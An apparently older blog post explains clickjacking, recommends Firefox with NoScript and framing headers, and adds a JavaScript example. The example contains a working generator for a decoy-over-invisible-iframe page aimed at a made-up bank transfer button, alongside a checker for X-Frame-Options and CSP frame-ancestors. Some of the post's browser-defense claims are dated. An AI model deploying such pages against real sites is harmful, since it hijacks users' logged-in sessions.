Clickjacking is one of the newest and most dangerous web browser attacks disclosed to date. Every browser is affected, even those that can defend against the related Cross Site Request Forgery (CSRF) attack: the hijacked click happens inside a real page, in a session you are already logged into, so the anti-CSRF tokens on that page's forms are submitted along with it.
Clickjacking can be used to make you carry out actions on any site or device you are logged into, from your online bank to the administration page of your home router. That can lead to the loss of your private information or, if the router's protections are stripped away, to your PC becoming the latest conscript in a bot army.
How clickjacking works: a compromised or malicious web page loads a legitimate site, such as your online banking or e-mail, inside an invisible frame, and positions that frame so one of its buttons sits right under the mouse pointer, beneath something harmless you are shown instead. You see and click the harmless thing; the click actually lands on the hidden button, with your credentials attached. As explained by Jeremiah Grossman, CEO of Whitehat Security:
“Think of any button on any Web site, internal or external, that you can get to appear between the browser walls. Wire transfers on banks, Digg buttons, CPC advertising banners, Netflix queue, etc. The list is virtually endless and these are relatively harmless examples. Next, consider that an attack can invisibly hover these buttons below the users’ mouse, so that when they click on something they visually see, they actually are clicking on something the attacker wants them to.”
Here is another example that is described by Robert Hansen, founder of SecTheory LLC:
“Say you have a home wireless router that you had authenticated prior to going to a [legitimate] Web site. [The attacker] could place a tag under your mouse that frames in a single button an order to the router to, for example, delete all firewall rules. That would give them an advantage in an attack.”
In other words, an attacker can make you perform any action that a click (or a short series of clicks) would perform on any site or device you are logged into, done with your credentials and from your own machine. That is not quite the same as physically stealing your computer, but for one-click actions like a wire transfer or a router configuration change the result is just as bad.
So, short of turning off your PC, how can you defend against clickjacking?
Where to get Firefox: www.getfirefox.com
IE users – take heart: during installation, Firefox can import all of your hard-won and well organized favorites, automatically.
After you have installed Firefox, install NoScript by going here: www.noscript.net
Articles on clickjacking and the Firefox / NoScript defense:
NoScript was one of PC World’s best products of the year, ranked at #52. I have used NoScript for a few years now and really appreciate its ability to block all foreign scripting, allowing only what I want to see.
Clickjacking cannot be fixed by web sites alone, but sites are not helpless either. A page can refuse to be framed: with a frame-busting script (which a determined attacker can sometimes bypass), and, in browsers that support them, by sending an X-Frame-Options header or a Content-Security-Policy frame-ancestors directive that tells the browser which sites, if any, may embed the page. The other half of the fix has to come from the browsers themselves. Reportedly the major browser makers (Microsoft, Mozilla, and Apple) are working on it. But don’t hold your breath – fixes are not likely to be released soon. Until then, Firefox with NoScript (its ClearClick feature, which exposes any attempt to click through a hidden frame) is the only defense that works in your browser no matter what a site does.
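To make both halves of the picture concrete, here is an added example. It is my own illustration, not code from the original post, from NoScript, or from any of the people quoted above. The first function builds the kind of decoy-over-invisible-frame page described in the “how clickjacking works” paragraph; the second implements the check a browser makes when a site sends X-Frame-Options or a frame-ancestors policy, which is the site-side defense. The bank URL, button coordinates and origins are made up, and the policy matcher leaves out ports and paths in source expressions.

```javascript
// Added example, not code from the original post. Two halves of the problem:
// the attacker's page layout the post describes, and the server-side check a
// site can use to decide whether a browser will let it be framed. Runs under
// Node.js with no network access. Every site, URL and coordinate is made up.

// --- Attacker side: a decoy over a transparent frame -----------------------
// The target page is loaded in an <iframe> with opacity:0 and shifted so that
// the button the attacker wants clicked sits exactly under a visible decoy.
// The victim's click lands in the frame, inside their own logged-in session
// (cookies included), so a CSRF token on the target form does not help.
function buildClickjackPage(opts) {
  const {
    targetUrl,                    // page containing the button to be hijacked
    buttonX, buttonY,             // that button's position inside the target (px)
    buttonW, buttonH,             // its size (px)
    decoyX = 200, decoyY = 150,   // where the decoy is drawn on the attacker page
    debug = false,                // true: half-transparent frame to check alignment
  } = opts;
  // Shift the frame so (buttonX, buttonY) in the target lands at (decoyX, decoyY).
  const frameLeft = decoyX - buttonX;
  const frameTop = decoyY - buttonY;
  const opacity = debug ? 0.5 : 0;
  const html = `<!doctype html><html><body>
<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;width:${buttonW}px;height:${buttonH}px;z-index:1">Claim your prize</button>
<iframe src="${targetUrl}" scrolling="no" style="position:absolute;left:${frameLeft}px;top:${frameTop}px;width:1200px;height:900px;border:0;opacity:${opacity};z-index:2"></iframe>
</body></html>`;
  return { html, frameLeft, frameTop };
}

// --- Defender side: tell the browser who may frame you ---------------------
// Match one CSP frame-ancestors source expression against the framing origin.
// Handles 'none', 'self', '*', scheme-only sources ("https:") and host sources
// with an optional scheme and a leading "*." wildcard. Ports and paths in
// source expressions are deliberately left out of this example.
function sourceMatches(src, framerOrigin, pageOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framerOrigin === pageOrigin;
  if (s === '*') return true;
  const framer = new URL(framerOrigin);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s;
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)$/);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && framer.protocol !== scheme + ':') return false;
  // "*.example.com" matches subdomains only, never the bare apex.
  return wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
}

// Decide whether a browser that honours both headers would render a page
// with these response headers inside a frame served from framerOrigin.
// Rules: a CSP frame-ancestors directive, when present, wins and
// X-Frame-Options is ignored; otherwise DENY blocks every framer and
// SAMEORIGIN allows only the page's own origin. No header means anyone can
// frame the page, which is the situation the post describes.
function framingAllowed(headers, framerOrigin, pageOrigin) {
  const get = (name) => {
    const key = Object.keys(headers).find((h) => h.toLowerCase() === name);
    return key === undefined ? undefined : headers[key];
  };
  const csp = get('content-security-policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => /^frame-ancestors(\s|$)/i.test(d));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1); // empty list == 'none'
      return sources.some((src) => sourceMatches(src, framerOrigin, pageOrigin));
    }
  }
  const xfo = get('x-frame-options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return framerOrigin === pageOrigin;
    // Any other value (including ALLOW-FROM, never supported by every browser)
    // is not relied on here: treat the page as unprotected.
  }
  return true;
}

if (typeof require !== 'undefined' && require.main === module) {
  const page = buildClickjackPage({ targetUrl: 'https://bank.example/transfer',
    buttonX: 420, buttonY: 310, buttonW: 120, buttonH: 40 });
  console.log(page.html);
  const weak = {};
  const fixed = { 'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'self'" };
  for (const [label, h] of [['no headers', weak], ['hardened', fixed]]) {
    console.log(label, '-> framed by attacker:',
      framingAllowed(h, 'https://evil.example', 'https://bank.example'));
  }
}

if (typeof module !== 'undefined') {
  module.exports = { buildClickjackPage, sourceMatches, framingAllowed };
}
```

Run it with `node` and open the printed HTML with `debug: true` to see why the geometry matters: the decoy and the framed button must overlap to the pixel, which is why attackers fix the frame's size and turn scrolling off. On the defender side, note that the CSP directive takes precedence over X-Frame-Options when both are present, so a site that sends `X-Frame-Options: DENY` but a permissive `frame-ancestors` list has only the weaker of the two.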